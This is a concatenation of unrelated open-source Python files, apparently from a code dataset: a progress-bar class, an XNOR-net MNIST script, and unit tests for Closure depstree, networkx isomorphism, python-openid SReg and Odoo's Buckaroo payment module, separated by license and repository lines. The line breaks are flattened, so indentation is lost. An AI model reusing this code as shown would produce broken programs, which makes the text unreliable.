# Copyright (c) 2012 Giorgos Verigakis <verigak@gmail.com> # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. from __future__ import division from collections import deque from datetime import timedelta from math import ceil from sys import stderr from time import time __version__ = '1.2' class Infinite(object): file = stderr sma_window = 10 def __init__(self, *args, **kwargs): self.index = 0 self.start_ts = time() self._ts = self.start_ts self._dt = deque(maxlen=self.sma_window) for key, val in kwargs.items(): setattr(self, key, val) def __getitem__(self, key): if key.startswith('_'): return None return getattr(self, key, None) @property def avg(self): return sum(self._dt) / len(self._dt) if self._dt else 0 @property def elapsed(self): return int(time() - self.start_ts) @property def elapsed_td(self): return timedelta(seconds=self.elapsed) def update(self): pass def start(self): pass def finish(self): pass def next(self, n=1): if n > 0: now = time() dt = (now - self._ts) / n self._dt.append(dt) self._ts = now self.index = self.index + n self.update() def iter(self, it): for x in it: yield x self.next() self.finish() class Progress(Infinite): def __init__(self, *args, **kwargs): super(Progress, self).__init__(*args, **kwargs) self.max = kwargs.get('max', 100) @property def eta(self): return int(ceil(self.avg * 
self.remaining)) @property def eta_td(self): return timedelta(seconds=self.eta) @property def percent(self): return self.progress * 100 @property def progress(self): return min(1, self.index / self.max) @property def remaining(self): return max(self.max - self.index, 0) def start(self): self.update() def goto(self, index): incr = index - self.index self.next(incr) def iter(self, it): try: self.max = len(it) except TypeError: pass for x in it: yield x self.next() self.finish()
gpl-3.0
DingKe/nn_playground
xnornet/mnist_mlp.py
1
2693
'''Trains a simple xnor fully connected NN on the MNIST dataset. Modified from keras' examples/mnist_mlp.py Gets to 97.41% test accuracy after 20 epochs using tensorflow backend ''' from __future__ import print_function import numpy as np np.random.seed(1337) # for reproducibility import keras.backend as K from keras.datasets import mnist from keras.models import Sequential from keras.layers import Dense, Dropout, Activation, BatchNormalization from keras.optimizers import SGD, Adam, RMSprop from keras.callbacks import LearningRateScheduler from keras.utils import np_utils from xnor_layers import XnorDense batch_size = 100 epochs = 20 classes = 10 H = 'Glorot' kernel_lr_multiplier = 'Glorot' # network num_unit = 2048 num_hidden = 3 use_bias = False # learning rate schedule lr_start = 1e-3 lr_end = 1e-4 lr_decay = (lr_end / lr_start)**(1. / epochs) # BN epsilon = 1e-6 momentum = 0.9 # dropout drop_in = 0 #0.2 drop_hidden = 0# 0.5 # the data, shuffled and split between train and test sets (X_train, y_train), (X_test, y_test) = mnist.load_data() X_train = X_train.reshape(60000, 784) X_test = X_test.reshape(10000, 784) X_train = X_train.astype('float32') X_test = X_test.astype('float32') X_train /= 255 X_test /= 255 print(X_train.shape[0], 'train samples') print(X_test.shape[0], 'test samples') # convert class vectors to binary class matrices Y_train = np_utils.to_categorical(y_train, classes) * 2 - 1 # -1 or 1 for hinge loss Y_test = np_utils.to_categorical(y_test, classes) * 2 - 1 model = Sequential() model.add(Dropout(drop_in, input_shape=(784,), name='drop0')) for i in range(num_hidden): model.add(XnorDense(num_unit, H=H, kernel_lr_multiplier=kernel_lr_multiplier, use_bias=use_bias, name='dense{}'.format(i+1))) model.add(BatchNormalization(epsilon=epsilon, momentum=momentum, name='bn{}'.format(i+1))) model.add(Activation('relu', name='act{}'.format(i+1))) model.add(Dropout(drop_hidden, name='drop{}'.format(i+1))) model.add(XnorDense(10, H=H, 
kernel_lr_multiplier=kernel_lr_multiplier, use_bias=use_bias, name='dense')) model.add(BatchNormalization(epsilon=epsilon, momentum=momentum, name='bn')) model.summary() opt = Adam(lr=lr_start) model.compile(loss='squared_hinge', optimizer=opt, metrics=['acc']) lr_scheduler = LearningRateScheduler(lambda e: lr_start * lr_decay ** e) history = model.fit(X_train, Y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(X_test, Y_test), callbacks=[lr_scheduler]) score = model.evaluate(X_test, Y_test, verbose=0) print('Test score:', score[0]) print('Test accuracy:', score[1])
mit
henriquespedro/Autarquia-Livre
vendor/openlayers/closure-library/closure/bin/build/depstree_test.py
354
3692
#!/usr/bin/env python # # Copyright 2009 The Closure Library Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Unit test for depstree.""" __author__ = 'nnaze@google.com (Nathan Naze)' import unittest import depstree def _GetProvides(sources): """Get all namespaces provided by a collection of sources.""" provides = set() for source in sources: provides.update(source.provides) return provides class MockSource(object): """Mock Source file.""" def __init__(self, provides, requires): self.provides = set(provides) self.requires = set(requires) def __repr__(self): return 'MockSource %s' % self.provides class DepsTreeTestCase(unittest.TestCase): """Unit test for DepsTree. Tests several common situations and errors.""" def AssertValidDependencies(self, deps_list): """Validates a dependency list. Asserts that a dependency list is valid: For every source in the list, ensure that every require is provided by a source earlier in the list. Args: deps_list: A list of sources that should be in dependency order. 
""" for i in range(len(deps_list)): source = deps_list[i] previous_provides = _GetProvides(deps_list[:i]) for require in source.requires: self.assertTrue( require in previous_provides, 'Namespace "%s" not provided before required by %s' % ( require, source)) def testSimpleDepsTree(self): a = MockSource(['A'], ['B', 'C']) b = MockSource(['B'], []) c = MockSource(['C'], ['D']) d = MockSource(['D'], ['E']) e = MockSource(['E'], []) tree = depstree.DepsTree([a, b, c, d, e]) self.AssertValidDependencies(tree.GetDependencies('A')) self.AssertValidDependencies(tree.GetDependencies('B')) self.AssertValidDependencies(tree.GetDependencies('C')) self.AssertValidDependencies(tree.GetDependencies('D')) self.AssertValidDependencies(tree.GetDependencies('E')) def testCircularDependency(self): # Circular deps a = MockSource(['A'], ['B']) b = MockSource(['B'], ['C']) c = MockSource(['C'], ['A']) tree = depstree.DepsTree([a, b, c]) self.assertRaises(depstree.CircularDependencyError, tree.GetDependencies, 'A') def testRequiresUndefinedNamespace(self): a = MockSource(['A'], ['B']) b = MockSource(['B'], ['C']) c = MockSource(['C'], ['D']) # But there is no D. def MakeDepsTree(): return depstree.DepsTree([a, b, c]) self.assertRaises(depstree.NamespaceNotFoundError, MakeDepsTree) def testDepsForMissingNamespace(self): a = MockSource(['A'], ['B']) b = MockSource(['B'], []) tree = depstree.DepsTree([a, b]) # There is no C. self.assertRaises(depstree.NamespaceNotFoundError, tree.GetDependencies, 'C') def testMultipleRequires(self): a = MockSource(['A'], ['B']) b = MockSource(['B'], ['C']) c = MockSource(['C'], []) d = MockSource(['D'], ['B']) tree = depstree.DepsTree([a, b, c, d]) self.AssertValidDependencies(tree.GetDependencies(['D', 'A'])) if __name__ == '__main__': unittest.main()
gpl-2.0
cogeorg/black_rhino
examples/firesales_SA/networkx/algorithms/isomorphism/tests/test_vf2userfunc.py
97
6665
""" Tests for VF2 isomorphism algorithm for weighted graphs. """ from nose.tools import assert_true, assert_false from operator import eq import networkx as nx import networkx.algorithms.isomorphism as iso def test_simple(): # 16 simple tests w = 'weight' edges = [(0,0,1),(0,0,1.5),(0,1,2),(1,0,3)] for g1 in [nx.Graph(), nx.DiGraph(), nx.MultiGraph(), nx.MultiDiGraph(), ]: g1.add_weighted_edges_from(edges) g2 = g1.subgraph(g1.nodes()) if g1.is_multigraph(): em = iso.numerical_multiedge_match('weight', 1) else: em = iso.numerical_edge_match('weight', 1) assert_true( nx.is_isomorphic(g1,g2,edge_match=em) ) for mod1, mod2 in [(False, True), (True, False), (True, True)]: # mod1 tests a regular edge # mod2 tests a selfloop if g2.is_multigraph(): if mod1: data1 = {0:{'weight':10}} if mod2: data2 = {0:{'weight':1},1:{'weight':2.5}} else: if mod1: data1 = {'weight':10} if mod2: data2 = {'weight':2.5} g2 = g1.subgraph(g1.nodes()) if mod1: if not g1.is_directed(): g2.adj[1][0] = data1 g2.adj[0][1] = data1 else: g2.succ[1][0] = data1 g2.pred[0][1] = data1 if mod2: if not g1.is_directed(): g2.adj[0][0] = data2 else: g2.succ[0][0] = data2 g2.pred[0][0] = data2 assert_false(nx.is_isomorphic(g1,g2,edge_match=em)) def test_weightkey(): g1 = nx.DiGraph() g2 = nx.DiGraph() g1.add_edge('A','B', weight=1) g2.add_edge('C','D', weight=0) assert_true( nx.is_isomorphic(g1, g2) ) em = iso.numerical_edge_match('nonexistent attribute', 1) assert_true( nx.is_isomorphic(g1, g2, edge_match=em) ) em = iso.numerical_edge_match('weight', 1) assert_false( nx.is_isomorphic(g1, g2, edge_match=em) ) g2 = nx.DiGraph() g2.add_edge('C','D') assert_true( nx.is_isomorphic(g1, g2, edge_match=em) ) class TestNodeMatch_Graph(object): def setUp(self): self.g1 = nx.Graph() self.g2 = nx.Graph() self.build() def build(self): self.nm = iso.categorical_node_match('color', '') self.em = iso.numerical_edge_match('weight', 1) self.g1.add_node('A', color='red') self.g2.add_node('C', color='blue') 
self.g1.add_edge('A','B', weight=1) self.g2.add_edge('C','D', weight=1) def test_noweight_nocolor(self): assert_true( nx.is_isomorphic(self.g1, self.g2) ) def test_color1(self): assert_false( nx.is_isomorphic(self.g1, self.g2, node_match=self.nm) ) def test_color2(self): self.g1.node['A']['color'] = 'blue' assert_true( nx.is_isomorphic(self.g1, self.g2, node_match=self.nm) ) def test_weight1(self): assert_true( nx.is_isomorphic(self.g1, self.g2, edge_match=self.em) ) def test_weight2(self): self.g1.add_edge('A', 'B', weight=2) assert_false( nx.is_isomorphic(self.g1, self.g2, edge_match=self.em) ) def test_colorsandweights1(self): iso = nx.is_isomorphic(self.g1, self.g2, node_match=self.nm, edge_match=self.em) assert_false(iso) def test_colorsandweights2(self): self.g1.node['A']['color'] = 'blue' iso = nx.is_isomorphic(self.g1, self.g2, node_match=self.nm, edge_match=self.em) assert_true(iso) def test_colorsandweights3(self): # make the weights disagree self.g1.add_edge('A', 'B', weight=2) assert_false( nx.is_isomorphic(self.g1, self.g2, node_match=self.nm, edge_match=self.em) ) class TestEdgeMatch_MultiGraph(object): def setUp(self): self.g1 = nx.MultiGraph() self.g2 = nx.MultiGraph() self.GM = iso.MultiGraphMatcher self.build() def build(self): g1 = self.g1 g2 = self.g2 # We will assume integer weights only. 
g1.add_edge('A', 'B', color='green', weight=0, size=.5) g1.add_edge('A', 'B', color='red', weight=1, size=.35) g1.add_edge('A', 'B', color='red', weight=2, size=.65) g2.add_edge('C', 'D', color='green', weight=1, size=.5) g2.add_edge('C', 'D', color='red', weight=0, size=.45) g2.add_edge('C', 'D', color='red', weight=2, size=.65) if g1.is_multigraph(): self.em = iso.numerical_multiedge_match('weight', 1) self.emc = iso.categorical_multiedge_match('color', '') self.emcm = iso.categorical_multiedge_match(['color', 'weight'], ['', 1]) self.emg1 = iso.generic_multiedge_match('color', 'red', eq) self.emg2 = iso.generic_multiedge_match(['color', 'weight', 'size'], ['red', 1, .5], [eq, eq, iso.matchhelpers.close]) else: self.em = iso.numerical_edge_match('weight', 1) self.emc = iso.categorical_edge_match('color', '') self.emcm = iso.categorical_edge_match(['color', 'weight'], ['', 1]) self.emg1 = iso.generic_multiedge_match('color', 'red', eq) self.emg2 = iso.generic_edge_match(['color', 'weight', 'size'], ['red', 1, .5], [eq, eq, iso.matchhelpers.close]) def test_weights_only(self): assert_true( nx.is_isomorphic(self.g1, self.g2, edge_match=self.em) ) def test_colors_only(self): gm = self.GM(self.g1, self.g2, edge_match=self.emc) assert_true( gm.is_isomorphic() ) def test_colorsandweights(self): gm = self.GM(self.g1, self.g2, edge_match=self.emcm) assert_false( gm.is_isomorphic() ) def test_generic1(self): gm = self.GM(self.g1, self.g2, edge_match=self.emg1) assert_true( gm.is_isomorphic() ) def test_generic2(self): gm = self.GM(self.g1, self.g2, edge_match=self.emg2) assert_false( gm.is_isomorphic() ) class TestEdgeMatch_DiGraph(TestNodeMatch_Graph): def setUp(self): self.g1 = nx.DiGraph() self.g2 = nx.DiGraph() self.build() class TestEdgeMatch_MultiDiGraph(TestEdgeMatch_MultiGraph): def setUp(self): self.g1 = nx.MultiDiGraph() self.g2 = nx.MultiDiGraph() self.GM = iso.MultiDiGraphMatcher self.build()
gpl-3.0
lmjohns3/cube-experiment
analysis/10-extract-jacobian-chunks.py
1
1827
import climate import gzip import io import joblib import lmj.cubes import logging import numpy as np import os TARGETS = '0123456789ab' def extract(trial, root, output, frames): fn = trial.root.replace(root, output).replace('.csv.gz', '') def save(df, targets, key): if not os.path.isdir(os.path.dirname(fn)): os.makedirs(os.path.dirname(fn)) out = fn + '_{}_{}.csv.gz'.format(targets, key) s = io.StringIO() df.to_csv(s, index_label='time') with gzip.open(out, 'w') as handle: handle.write(s.getvalue().encode('utf-8')) logging.info('%s: %s', out, df.shape) trial.load() body = lmj.cubes.Trial(trial.parent, trial.basename) body.df = trial.df.copy() body.make_body_relative() body.add_velocities() goal = lmj.cubes.Trial(trial.parent, trial.basename) goal.df = trial.df.copy() goal.make_target_relative() goal.add_velocities() _, jac = trial.jacobian(frames) for t, target in enumerate(TARGETS): mask = trial.df.target == t if np.sum(mask) > 0: sources = trial.df[mask].source.unique() assert len(sources) == 1 tgt = '{}{}'.format(TARGETS[int(sources[0])], target) save(body.df[mask], tgt, 'body') save(goal.df[mask], tgt, 'goal') save(jac[mask], tgt, 'jac') @climate.annotate( root='load data from this root directory', output='save chunks to this directory', frames=('compute jacobian over this many frames', 'option', None, int), ) def main(root, output, frames=10): trials = lmj.cubes.Experiment(root).trials_matching('*') work = joblib.delayed(extract) joblib.Parallel(-1)(work(t, root, output, frames) for t in trials) if __name__ == '__main__': climate.call(main)
mit
ehashman/oh-mainline
vendor/packages/python-openid/openid/test/test_sreg.py
86
17151
from openid.extensions import sreg from openid.message import NamespaceMap, Message, registerNamespaceAlias from openid.server.server import OpenIDRequest, OpenIDResponse import unittest class SRegURITest(unittest.TestCase): def test_is11(self): self.failUnlessEqual(sreg.ns_uri_1_1, sreg.ns_uri) class CheckFieldNameTest(unittest.TestCase): def test_goodNamePasses(self): for field_name in sreg.data_fields: sreg.checkFieldName(field_name) def test_badNameFails(self): self.failUnlessRaises(ValueError, sreg.checkFieldName, 'INVALID') def test_badTypeFails(self): self.failUnlessRaises(ValueError, sreg.checkFieldName, None) # For supportsSReg test class FakeEndpoint(object): def __init__(self, supported): self.supported = supported self.checked_uris = [] def usesExtension(self, namespace_uri): self.checked_uris.append(namespace_uri) return namespace_uri in self.supported class SupportsSRegTest(unittest.TestCase): def test_unsupported(self): endpoint = FakeEndpoint([]) self.failIf(sreg.supportsSReg(endpoint)) self.failUnlessEqual([sreg.ns_uri_1_1, sreg.ns_uri_1_0], endpoint.checked_uris) def test_supported_1_1(self): endpoint = FakeEndpoint([sreg.ns_uri_1_1]) self.failUnless(sreg.supportsSReg(endpoint)) self.failUnlessEqual([sreg.ns_uri_1_1], endpoint.checked_uris) def test_supported_1_0(self): endpoint = FakeEndpoint([sreg.ns_uri_1_0]) self.failUnless(sreg.supportsSReg(endpoint)) self.failUnlessEqual([sreg.ns_uri_1_1, sreg.ns_uri_1_0], endpoint.checked_uris) class FakeMessage(object): def __init__(self): self.openid1 = False self.namespaces = NamespaceMap() def isOpenID1(self): return self.openid1 class GetNSTest(unittest.TestCase): def setUp(self): self.msg = FakeMessage() def test_openID2Empty(self): ns_uri = sreg.getSRegNS(self.msg) self.failUnlessEqual(self.msg.namespaces.getAlias(ns_uri), 'sreg') self.failUnlessEqual(sreg.ns_uri, ns_uri) def test_openID1Empty(self): self.msg.openid1 = True ns_uri = sreg.getSRegNS(self.msg) 
self.failUnlessEqual(self.msg.namespaces.getAlias(ns_uri), 'sreg') self.failUnlessEqual(sreg.ns_uri, ns_uri) def test_openID1Defined_1_0(self): self.msg.openid1 = True self.msg.namespaces.add(sreg.ns_uri_1_0) ns_uri = sreg.getSRegNS(self.msg) self.failUnlessEqual(sreg.ns_uri_1_0, ns_uri) def test_openID1Defined_1_0_overrideAlias(self): for openid_version in [True, False]: for sreg_version in [sreg.ns_uri_1_0, sreg.ns_uri_1_1]: for alias in ['sreg', 'bogus']: self.setUp() self.msg.openid1 = openid_version self.msg.namespaces.addAlias(sreg_version, alias) ns_uri = sreg.getSRegNS(self.msg) self.failUnlessEqual(self.msg.namespaces.getAlias(ns_uri), alias) self.failUnlessEqual(sreg_version, ns_uri) def test_openID1DefinedBadly(self): self.msg.openid1 = True self.msg.namespaces.addAlias('http://invalid/', 'sreg') self.failUnlessRaises(sreg.SRegNamespaceError, sreg.getSRegNS, self.msg) def test_openID2DefinedBadly(self): self.msg.openid1 = False self.msg.namespaces.addAlias('http://invalid/', 'sreg') self.failUnlessRaises(sreg.SRegNamespaceError, sreg.getSRegNS, self.msg) def test_openID2Defined_1_0(self): self.msg.namespaces.add(sreg.ns_uri_1_0) ns_uri = sreg.getSRegNS(self.msg) self.failUnlessEqual(sreg.ns_uri_1_0, ns_uri) def test_openID1_sregNSfromArgs(self): args = { 'sreg.optional': 'nickname', 'sreg.required': 'dob', } m = Message.fromOpenIDArgs(args) self.failUnless(m.getArg(sreg.ns_uri_1_1, 'optional') == 'nickname') self.failUnless(m.getArg(sreg.ns_uri_1_1, 'required') == 'dob') class SRegRequestTest(unittest.TestCase): def test_constructEmpty(self): req = sreg.SRegRequest() self.failUnlessEqual([], req.optional) self.failUnlessEqual([], req.required) self.failUnlessEqual(None, req.policy_url) self.failUnlessEqual(sreg.ns_uri, req.ns_uri) def test_constructFields(self): req = sreg.SRegRequest( ['nickname'], ['gender'], 'http://policy', 'http://sreg.ns_uri') self.failUnlessEqual(['gender'], req.optional) self.failUnlessEqual(['nickname'], req.required) 
self.failUnlessEqual('http://policy', req.policy_url) self.failUnlessEqual('http://sreg.ns_uri', req.ns_uri) def test_constructBadFields(self): self.failUnlessRaises( ValueError, sreg.SRegRequest, ['elvis']) def test_fromOpenIDRequest(self): args = {} ns_sentinel = object() args_sentinel = object() class FakeMessage(object): copied = False def __init__(self): self.message = Message() def getArgs(msg_self, ns_uri): self.failUnlessEqual(ns_sentinel, ns_uri) return args_sentinel def copy(msg_self): msg_self.copied = True return msg_self class TestingReq(sreg.SRegRequest): def _getSRegNS(req_self, unused): return ns_sentinel def parseExtensionArgs(req_self, args): self.failUnlessEqual(args_sentinel, args) openid_req = OpenIDRequest() msg = FakeMessage() openid_req.message = msg req = TestingReq.fromOpenIDRequest(openid_req) self.failUnless(type(req) is TestingReq) self.failUnless(msg.copied) def test_parseExtensionArgs_empty(self): req = sreg.SRegRequest() results = req.parseExtensionArgs({}) self.failUnlessEqual(None, results) def test_parseExtensionArgs_extraIgnored(self): req = sreg.SRegRequest() req.parseExtensionArgs({'janrain':'inc'}) def test_parseExtensionArgs_nonStrict(self): req = sreg.SRegRequest() req.parseExtensionArgs({'required':'beans'}) self.failUnlessEqual([], req.required) def test_parseExtensionArgs_strict(self): req = sreg.SRegRequest() self.failUnlessRaises( ValueError, req.parseExtensionArgs, {'required':'beans'}, strict=True) def test_parseExtensionArgs_policy(self): req = sreg.SRegRequest() req.parseExtensionArgs({'policy_url':'http://policy'}, strict=True) self.failUnlessEqual('http://policy', req.policy_url) def test_parseExtensionArgs_requiredEmpty(self): req = sreg.SRegRequest() req.parseExtensionArgs({'required':''}, strict=True) self.failUnlessEqual([], req.required) def test_parseExtensionArgs_optionalEmpty(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':''}, strict=True) self.failUnlessEqual([], req.optional) def 
test_parseExtensionArgs_optionalSingle(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname'}, strict=True) self.failUnlessEqual(['nickname'], req.optional) def test_parseExtensionArgs_optionalList(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname,email'}, strict=True) self.failUnlessEqual(['nickname','email'], req.optional) def test_parseExtensionArgs_optionalListBadNonStrict(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname,email,beer'}) self.failUnlessEqual(['nickname','email'], req.optional) def test_parseExtensionArgs_optionalListBadStrict(self): req = sreg.SRegRequest() self.failUnlessRaises( ValueError, req.parseExtensionArgs, {'optional':'nickname,email,beer'}, strict=True) def test_parseExtensionArgs_bothNonStrict(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname', 'required':'nickname'}) self.failUnlessEqual([], req.optional) self.failUnlessEqual(['nickname'], req.required) def test_parseExtensionArgs_bothStrict(self): req = sreg.SRegRequest() self.failUnlessRaises( ValueError, req.parseExtensionArgs, {'optional':'nickname', 'required':'nickname'}, strict=True) def test_parseExtensionArgs_bothList(self): req = sreg.SRegRequest() req.parseExtensionArgs({'optional':'nickname,email', 'required':'country,postcode'}, strict=True) self.failUnlessEqual(['nickname','email'], req.optional) self.failUnlessEqual(['country','postcode'], req.required) def test_allRequestedFields(self): req = sreg.SRegRequest() self.failUnlessEqual([], req.allRequestedFields()) req.requestField('nickname') self.failUnlessEqual(['nickname'], req.allRequestedFields()) req.requestField('gender', required=True) requested = req.allRequestedFields() requested.sort() self.failUnlessEqual(['gender', 'nickname'], requested) def test_wereFieldsRequested(self): req = sreg.SRegRequest() self.failIf(req.wereFieldsRequested()) req.requestField('gender') self.failUnless(req.wereFieldsRequested()) 
def test_contains(self): req = sreg.SRegRequest() for field_name in sreg.data_fields: self.failIf(field_name in req) self.failIf('something else' in req) req.requestField('nickname') for field_name in sreg.data_fields: if field_name == 'nickname': self.failUnless(field_name in req) else: self.failIf(field_name in req) def test_requestField_bogus(self): req = sreg.SRegRequest() self.failUnlessRaises( ValueError, req.requestField, 'something else') self.failUnlessRaises( ValueError, req.requestField, 'something else', strict=True) def test_requestField(self): # Add all of the fields, one at a time req = sreg.SRegRequest() fields = list(sreg.data_fields) for field_name in fields: req.requestField(field_name) self.failUnlessEqual(fields, req.optional) self.failUnlessEqual([], req.required) # By default, adding the same fields over again has no effect for field_name in fields: req.requestField(field_name) self.failUnlessEqual(fields, req.optional) self.failUnlessEqual([], req.required) # Requesting a field as required overrides requesting it as optional expected = list(fields) overridden = expected.pop(0) req.requestField(overridden, required=True) self.failUnlessEqual(expected, req.optional) self.failUnlessEqual([overridden], req.required) # Requesting a field as required overrides requesting it as optional for field_name in fields: req.requestField(field_name, required=True) self.failUnlessEqual([], req.optional) self.failUnlessEqual(fields, req.required) # Requesting it as optional does not downgrade it to optional for field_name in fields: req.requestField(field_name) self.failUnlessEqual([], req.optional) self.failUnlessEqual(fields, req.required) def test_requestFields_type(self): req = sreg.SRegRequest() self.failUnlessRaises(TypeError, req.requestFields, 'nickname') def test_requestFields(self): # Add all of the fields req = sreg.SRegRequest() fields = list(sreg.data_fields) req.requestFields(fields) self.failUnlessEqual(fields, req.optional) 
self.failUnlessEqual([], req.required) # By default, adding the same fields over again has no effect req.requestFields(fields) self.failUnlessEqual(fields, req.optional) self.failUnlessEqual([], req.required) # Requesting a field as required overrides requesting it as optional expected = list(fields) overridden = expected.pop(0) req.requestFields([overridden], required=True) self.failUnlessEqual(expected, req.optional) self.failUnlessEqual([overridden], req.required) # Requesting a field as required overrides requesting it as optional req.requestFields(fields, required=True) self.failUnlessEqual([], req.optional) self.failUnlessEqual(fields, req.required) # Requesting it as optional does not downgrade it to optional req.requestFields(fields) self.failUnlessEqual([], req.optional) self.failUnlessEqual(fields, req.required) def test_getExtensionArgs(self): req = sreg.SRegRequest() self.failUnlessEqual({}, req.getExtensionArgs()) req.requestField('nickname') self.failUnlessEqual({'optional':'nickname'}, req.getExtensionArgs()) req.requestField('email') self.failUnlessEqual({'optional':'nickname,email'}, req.getExtensionArgs()) req.requestField('gender', required=True) self.failUnlessEqual({'optional':'nickname,email', 'required':'gender'}, req.getExtensionArgs()) req.requestField('postcode', required=True) self.failUnlessEqual({'optional':'nickname,email', 'required':'gender,postcode'}, req.getExtensionArgs()) req.policy_url = 'http://policy.invalid/' self.failUnlessEqual({'optional':'nickname,email', 'required':'gender,postcode', 'policy_url':'http://policy.invalid/'}, req.getExtensionArgs()) data = { 'nickname':'linusaur', 'postcode':'12345', 'country':'US', 'gender':'M', 'fullname':'Leonhard Euler', 'email':'president@whitehouse.gov', 'dob':'0000-00-00', 'language':'en-us', } class DummySuccessResponse(object): def __init__(self, message, signed_stuff): self.message = message self.signed_stuff = signed_stuff def getSignedNS(self, ns_uri): return self.signed_stuff 
class SRegResponseTest(unittest.TestCase): def test_construct(self): resp = sreg.SRegResponse(data) self.failUnless(resp) empty_resp = sreg.SRegResponse({}) self.failIf(empty_resp) # XXX: finish this test def test_fromSuccessResponse_signed(self): message = Message.fromOpenIDArgs({ 'sreg.nickname':'The Mad Stork', }) success_resp = DummySuccessResponse(message, {}) sreg_resp = sreg.SRegResponse.fromSuccessResponse(success_resp) self.failIf(sreg_resp) def test_fromSuccessResponse_unsigned(self): message = Message.fromOpenIDArgs({ 'sreg.nickname':'The Mad Stork', }) success_resp = DummySuccessResponse(message, {}) sreg_resp = sreg.SRegResponse.fromSuccessResponse(success_resp, signed_only=False) self.failUnlessEqual([('nickname', 'The Mad Stork')], sreg_resp.items()) class SendFieldsTest(unittest.TestCase): def test(self): # Create a request message with simple registration fields sreg_req = sreg.SRegRequest(required=['nickname', 'email'], optional=['fullname']) req_msg = Message() req_msg.updateArgs(sreg.ns_uri, sreg_req.getExtensionArgs()) req = OpenIDRequest() req.message = req_msg req.namespace = req_msg.getOpenIDNamespace() # -> send checkid_* request # Create an empty response message resp_msg = Message() resp = OpenIDResponse(req) resp.fields = resp_msg # Put the requested data fields in the response message sreg_resp = sreg.SRegResponse.extractResponse(sreg_req, data) resp.addExtension(sreg_resp) # <- send id_res response # Extract the fields that were sent sreg_data_resp = resp_msg.getArgs(sreg.ns_uri) self.failUnlessEqual( {'nickname':'linusaur', 'email':'president@whitehouse.gov', 'fullname':'Leonhard Euler', }, sreg_data_resp) if __name__ == '__main__': unittest.main()
agpl-3.0
vnsofthe/odoo-dev
addons/payment_buckaroo/tests/test_buckaroo.py
321
8132
# -*- coding: utf-8 -*- from lxml import objectify import urlparse import openerp from openerp.addons.payment.models.payment_acquirer import ValidationError from openerp.addons.payment.tests.common import PaymentAcquirerCommon from openerp.addons.payment_buckaroo.controllers.main import BuckarooController from openerp.tools import mute_logger @openerp.tests.common.at_install(False) @openerp.tests.common.post_install(False) class BuckarooCommon(PaymentAcquirerCommon): def setUp(self): super(BuckarooCommon, self).setUp() cr, uid = self.cr, self.uid self.base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url') # get the buckaroo account model, self.buckaroo_id = self.registry('ir.model.data').get_object_reference(cr, uid, 'payment_buckaroo', 'payment_acquirer_buckaroo') @openerp.tests.common.at_install(False) @openerp.tests.common.post_install(False) class BuckarooForm(BuckarooCommon): def test_10_Buckaroo_form_render(self): cr, uid, context = self.cr, self.uid, {} # be sure not to do stupid things buckaroo = self.payment_acquirer.browse(self.cr, self.uid, self.buckaroo_id, None) self.assertEqual(buckaroo.environment, 'test', 'test without test environment') # ---------------------------------------- # Test: button direct rendering # ---------------------------------------- form_values = { 'add_returndata': None, 'Brq_websitekey': buckaroo.brq_websitekey, 'Brq_amount': '2240.0', 'Brq_currency': 'EUR', 'Brq_invoicenumber': 'SO004', 'Brq_signature': '1b8c10074c622d965272a91a9e88b5b3777d2474', # update me 'brq_test': 'True', 'Brq_return': '%s' % urlparse.urljoin(self.base_url, BuckarooController._return_url), 'Brq_returncancel': '%s' % urlparse.urljoin(self.base_url, BuckarooController._cancel_url), 'Brq_returnerror': '%s' % urlparse.urljoin(self.base_url, BuckarooController._exception_url), 'Brq_returnreject': '%s' % urlparse.urljoin(self.base_url, BuckarooController._reject_url), 'Brq_culture': 'en-US', } # render the button res = 
self.payment_acquirer.render( cr, uid, self.buckaroo_id, 'SO004', 2240.0, self.currency_euro_id, partner_id=None, partner_values=self.buyer_values, context=context) # check form result tree = objectify.fromstring(res) self.assertEqual(tree.get('action'), 'https://testcheckout.buckaroo.nl/html/', 'Buckaroo: wrong form POST url') for form_input in tree.input: if form_input.get('name') in ['submit']: continue self.assertEqual( form_input.get('value'), form_values[form_input.get('name')], 'Buckaroo: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')]) ) # ---------------------------------------- # Test2: button using tx + validation # ---------------------------------------- # create a new draft tx tx_id = self.payment_transaction.create( cr, uid, { 'amount': 2240.0, 'acquirer_id': self.buckaroo_id, 'currency_id': self.currency_euro_id, 'reference': 'SO004', 'partner_id': self.buyer_id, }, context=context ) # render the button res = self.payment_acquirer.render( cr, uid, self.buckaroo_id, 'should_be_erased', 2240.0, self.currency_euro, tx_id=tx_id, partner_id=None, partner_values=self.buyer_values, context=context) # check form result tree = objectify.fromstring(res) self.assertEqual(tree.get('action'), 'https://testcheckout.buckaroo.nl/html/', 'Buckaroo: wrong form POST url') for form_input in tree.input: if form_input.get('name') in ['submit']: continue self.assertEqual( form_input.get('value'), form_values[form_input.get('name')], 'Buckaroo: wrong value for form input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')]) ) 